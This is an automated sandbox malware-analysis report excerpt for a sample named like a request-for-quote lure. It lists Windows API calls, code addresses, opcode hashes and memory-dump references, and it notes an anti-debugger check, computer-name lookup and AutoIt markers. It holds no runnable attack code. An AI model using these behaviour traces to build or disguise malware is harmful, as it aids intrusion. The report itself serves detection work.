                                                                                • Snapshot File: hcaresult_0_2_b70000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: File$PointerWrite
                                                                                • String ID:
                                                                                • API String ID: 539440098-0
                                                                                • Opcode ID: 31d1dbf11d86c586347ee0a4a855d954206b7a782823b218fc83e8c250945dc9
                                                                                • Instruction ID: b1023af1c2a7e92061c046face190464fba960f27da5cf76490bbfb90a9b435d
                                                                                • Opcode Fuzzy Hash: 31d1dbf11d86c586347ee0a4a855d954206b7a782823b218fc83e8c250945dc9
                                                                                • Instruction Fuzzy Hash: 87318F6050D384AED7118B298859F2FBFE0AF92714F89C5CDE4BC96291D3B888489F57
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 004044CF
                                                                                  • Part of subcall function 0040407C: _memset.LIBCMT ref: 004040FC
                                                                                  • Part of subcall function 0040407C: _wcscpy.LIBCMT ref: 00404150
                                                                                  • Part of subcall function 0040407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160
                                                                                • KillTimer.USER32(?,00000001,?,?), ref: 00404524
                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00404533
                                                                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0043D4B9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                • String ID:
                                                                                • API String ID: 1378193009-0
                                                                                • Opcode ID: 8233c1c53fe49e8a502b553c2e8f55af8437e20015ea4a24a99bc4102d4ad802
                                                                                • Instruction ID: dcb2c65cf3c1a774e1d203f737fabc32089307ed9affa8f53aec521d9447171b
                                                                                • Opcode Fuzzy Hash: 8233c1c53fe49e8a502b553c2e8f55af8437e20015ea4a24a99bc4102d4ad802
                                                                                • Instruction Fuzzy Hash: 6F21FBB0904754AFE7328B249C45BEBBBEC9B55318F0404AFE79A56281C3782984CB49
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: _memmove
                                                                                • String ID: AU3!P/I$EA06
                                                                                • API String ID: 4104443479-1914660620
                                                                                • Opcode ID: 9c66a10a8673985021788653dd36bc4fd35b7771d48e8ec4f3bf100b67519411
                                                                                • Instruction ID: ff6ab1fe0fa27ea81cbcababf34b5742e04188ff143208347500ec0318cc5285
                                                                                • Opcode Fuzzy Hash: 9c66a10a8673985021788653dd36bc4fd35b7771d48e8ec4f3bf100b67519411
                                                                                • Instruction Fuzzy Hash: F1418AB1A0415867DB219B6498517BF7BA19FC5304F28407BEE82BB3C2D63C5D4583AA
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 0043EA39
                                                                                • GetOpenFileNameW.COMDLG32(?), ref: 0043EA83
                                                                                  • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
                                                                                  • Part of subcall function 00420791: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Name$Path$FileFullLongOpen_memset
                                                                                • String ID: X
                                                                                • API String ID: 3777226403-3081909835
                                                                                • Opcode ID: f7a2dfced1c7fac4da1122c6cfde17308801e93c3a8658db5658365851755d62
                                                                                • Instruction ID: baa1e7331fae4d359aac7897d23b5e8ce5a65ce190648e6f88e75d23560a4c0c
                                                                                • Opcode Fuzzy Hash: f7a2dfced1c7fac4da1122c6cfde17308801e93c3a8658db5658365851755d62
                                                                                • Instruction Fuzzy Hash: 4421A471A102589BCB41DF95D845BDE7BF8AF49314F00806FE508B7281DBB85989CFAA
                                                                                APIs
                                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 004698F8
                                                                                • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0046990F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Temp$FileNamePath
                                                                                • String ID: aut
                                                                                • API String ID: 3285503233-3010740371
                                                                                • Opcode ID: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
                                                                                • Instruction ID: d76eb4abf93f0e171a782776cb2de2514a1bc3ee8d101bd4a6c1c3d5b9ef8161
                                                                                • Opcode Fuzzy Hash: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
                                                                                • Instruction Fuzzy Hash: D0D05E7954030DABDB50ABA0DC0EFDA773CE704700F0006F5BA54D10A1EAB1A5988BA9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
                                                                                • Instruction ID: 208f182f3c9136cc863dec11eab3d0960db0a10b8073f2b3425ab1c058278d8f
                                                                                • Opcode Fuzzy Hash: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
                                                                                • Instruction Fuzzy Hash: 8AF13A716083019FC714DF29C480A6ABBE5FF88318F54892EF8999B392D734E945CF86
                                                                                APIs
                                                                                • GetFileSize.KERNEL32(?,00B78FCC,?,00000001,?,00000002,?,?), ref: 00B798BE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1541018921.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_b70000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: FileSize
                                                                                • String ID:
                                                                                • API String ID: 3433856609-0
                                                                                • Opcode ID: da3978c74705996be0a82a549c343441f22c9ee117fcb3519d3b4f12a33514e0
                                                                                • Instruction ID: fccb4e798841df6093e749e1f83c8cb8aab19b8711528e497605bf76aaa5bbcb
                                                                                • Opcode Fuzzy Hash: da3978c74705996be0a82a549c343441f22c9ee117fcb3519d3b4f12a33514e0
                                                                                • Instruction Fuzzy Hash: BA91436198D3819FDB3A4A38485D6757BE1EB63360F8CC5DAD1BE8A2F2DA548C04C353
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1541018921.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_b70000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: ComputerName
                                                                                • String ID:
                                                                                • API String ID: 3545744682-0
                                                                                • Opcode ID: 632ce4338bef30bcc1330a43ca9ed7cd9d81802ee527a49d54b614b6524a940d
                                                                                • Instruction ID: bc6130a22fa806a1cce848278d2fcf5cb13a28e79526723ef492285ca7a893a3
                                                                                • Opcode Fuzzy Hash: 632ce4338bef30bcc1330a43ca9ed7cd9d81802ee527a49d54b614b6524a940d
                                                                                • Instruction Fuzzy Hash: 6A21F8F0AED3406BDE3567248C46FB93AF5EF62710F8844F9F588561E2DD646C088263
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 00404370
                                                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415
                                                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00404432
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: IconNotifyShell_$_memset
                                                                                • String ID:
                                                                                • API String ID: 1505330794-0
                                                                                • Opcode ID: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
                                                                                • Instruction ID: 448a70bf35e4549ae47872dc9eb977fea889799f7ce089bf6dae1479d4278b9a
                                                                                • Opcode Fuzzy Hash: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
                                                                                • Instruction Fuzzy Hash: 4E3184B05047019FD760DF24D884A9BBBF8FB98308F00093FEA9A92391D7746944CB5A
                                                                                APIs
                                                                                • __FF_MSGBANNER.LIBCMT ref: 00425733
                                                                                  • Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A192
                                                                                  • Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A19C
                                                                                • __NMSG_WRITE.LIBCMT ref: 0042573A
                                                                                  • Part of subcall function 0042A1C8: GetModuleFileNameW.KERNEL32(00000000,004C33BA,00000104,00000000,00000001,00000000), ref: 0042A25A
                                                                                  • Part of subcall function 0042A1C8: ___crtMessageBoxW.LIBCMT ref: 0042A308
                                                                                  • Part of subcall function 0042309F: ___crtCorExitProcess.LIBCMT ref: 004230A5
                                                                                  • Part of subcall function 0042309F: ExitProcess.KERNEL32 ref: 004230AE
                                                                                  • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                                                • RtlAllocateHeap.NTDLL(00BF0000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                • String ID:
                                                                                • API String ID: 1372826849-0
                                                                                • Opcode ID: 173bc1eb0939af60788e3920f729a181213a4711687b08a62f5fb4dd74449d1b
                                                                                • Instruction ID: 12628286b9c33790f0bcaf27d243d0f78d5a939af01e39ac9af769d2403f214a
                                                                                • Opcode Fuzzy Hash: 173bc1eb0939af60788e3920f729a181213a4711687b08a62f5fb4dd74449d1b
                                                                                • Instruction Fuzzy Hash: 8101D235380B31DADA102B36BC42A2E67588BC2766FD0043FF9059A281DE7C9D01866D
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00469548,?,?,?,?,?,00000004), ref: 004698BB
                                                                                • SetFileTime.KERNEL32(00000000,?,00000000,?,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 004698D1
                                                                                • CloseHandle.KERNEL32(00000000,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004698D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: File$CloseCreateHandleTime
                                                                                • String ID:
                                                                                • API String ID: 3397143404-0
                                                                                • Opcode ID: bd87c49bddbed0dd2230edd6d70eff61a4bb717c0cd42ce1b208173b53aacf55
                                                                                • Instruction ID: c759ec0fed9c3a555ac5ec6521767d99e991bc38b38178bd45d0c2782cb34c4e
                                                                                • Opcode Fuzzy Hash: bd87c49bddbed0dd2230edd6d70eff61a4bb717c0cd42ce1b208173b53aacf55
                                                                                • Instruction Fuzzy Hash: 6EE08632140214B7D7212B54EC0DFDE7B19EB06760F144535FF14A90E087B12925979C
                                                                                APIs
                                                                                • _free.LIBCMT ref: 00468D1B
                                                                                  • Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
                                                                                  • Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B
                                                                                • _free.LIBCMT ref: 00468D2C
                                                                                • _free.LIBCMT ref: 00468D3E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                • Instruction ID: 6b151060fb8ed88ed9ffdc5938a612973e117ec8253147f08314cae1c0c73c84
                                                                                • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                • Instruction Fuzzy Hash: 10E0C2B170171253CB20A579BA40A8313DC4F4C3967440A0FB40DD7282DEACF842803C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: CALL
                                                                                • API String ID: 0-4196123274
                                                                                • Opcode ID: 54e70f6dbdc0f72c3666d2773d7bf126ba6680f6ba681bae959ad27e66740017
                                                                                • Instruction ID: c803bb07f2a617980fc862d1973d54e65b33ee20ceb4547c7cbfd92c67e19f3b
                                                                                • Opcode Fuzzy Hash: 54e70f6dbdc0f72c3666d2773d7bf126ba6680f6ba681bae959ad27e66740017
                                                                                • Instruction Fuzzy Hash: 8A225B70608301DFD724DF14C454A6AB7E1FF44308F15896EE98AAB3A2D739EC55CB8A
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: _memmove
                                                                                • String ID:
                                                                                • API String ID: 4104443479-0
                                                                                • Opcode ID: 0323a77de9f9f125283f9f3eac0b647bd9c1fd2c8af7472a6d701d539f1455ed
                                                                                • Instruction ID: 2724e85abdc1188f3097b0ceee28e317ee468c7dcaf0b9eeda237b3ec1003ef0
                                                                                • Opcode Fuzzy Hash: 0323a77de9f9f125283f9f3eac0b647bd9c1fd2c8af7472a6d701d539f1455ed
                                                                                • Instruction Fuzzy Hash: CB31C4B1B00506AFC704DF69D891E69B3A4FF48314715822AE519CB3D1EB38F911CB95
                                                                                APIs
                                                                                • IsThemeActive.UXTHEME ref: 00404834
                                                                                  • Part of subcall function 0042336C: __lock.LIBCMT ref: 00423372
                                                                                  • Part of subcall function 0042336C: DecodePointer.KERNEL32(00000001,?,00404849,00457C74), ref: 0042337E
                                                                                  • Part of subcall function 0042336C: EncodePointer.KERNEL32(?,?,00404849,00457C74), ref: 00423389
                                                                                  • Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00404915
                                                                                  • Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040492A
                                                                                  • Part of subcall function 00403B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
                                                                                  • Part of subcall function 00403B3A: IsDebuggerPresent.KERNEL32 ref: 00403B7A
                                                                                  • Part of subcall function 00403B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB
                                                                                  • Part of subcall function 00403B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F
                                                                                • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00404874
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                • String ID:
                                                                                • API String ID: 1438897964-0
                                                                                • Opcode ID: 13bbe0c74f5194e49c071aa5a0b14ab81aac5f2f5d26dabd82ae82306b4d1084
                                                                                • Instruction ID: 9525eea27cfe2a06ee6bb0b94f8a439f0fec78f72a1223afaaa4f4cc7b3f6ca0
                                                                                • Opcode Fuzzy Hash: 13bbe0c74f5194e49c071aa5a0b14ab81aac5f2f5d26dabd82ae82306b4d1084
                                                                                • Instruction Fuzzy Hash: 96118E729143019BC700EF69E80591EBBE8EB95754F10893FF440932B2DB749A49CB9E
                                                                                APIs
                                                                                • CreateThread.KERNEL32(00000000,00000000,00B755C0,?,00000000,00000000), ref: 00B75A51
                                                                                • RtlExitUserThread.NTDLL(00000000), ref: 00B75B11
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1541018921.0000000000B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_b70000_RFQ _ Virtue 054451000085.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$CreateExitUser
                                                                                • String ID:
                                                                                • API String ID: 4108186749-0
                                                                                • Opcode ID: a73756e86c8a57502ce4f38aa298a38da60a6afeec5b86659caed9a79da44267
                                                                                • Instruction ID: 4e669462f694e8cc1f3b2d3bef18a22f61420b334b85a52d2bbfe8881f14d2c3
                                                                                • Opcode Fuzzy Hash: a73756e86c8a57502ce4f38aa298a38da60a6afeec5b86659caed9a79da44267
                                                                                • Instruction Fuzzy Hash: 54111C1050DBC14ED7338B28482576ABFE09F63720F5986DAD1E84E1E3C2D9490C93A3
                                                                                APIs
                                                                                  • Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
                                                                                  • Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
                                                                                  • Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00BF0000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                                                                • std::exception::exception.LIBCMT ref: 00420DEC
                                                                                • __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                                  • Part of subcall function 0042859B: RaiseException.KERNEL32(?,?,00000000,004B9E78,?,00000001,?,?,?,00420E06,00000000,004B9E78,00409E8C,00000001), ref: 004285F0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
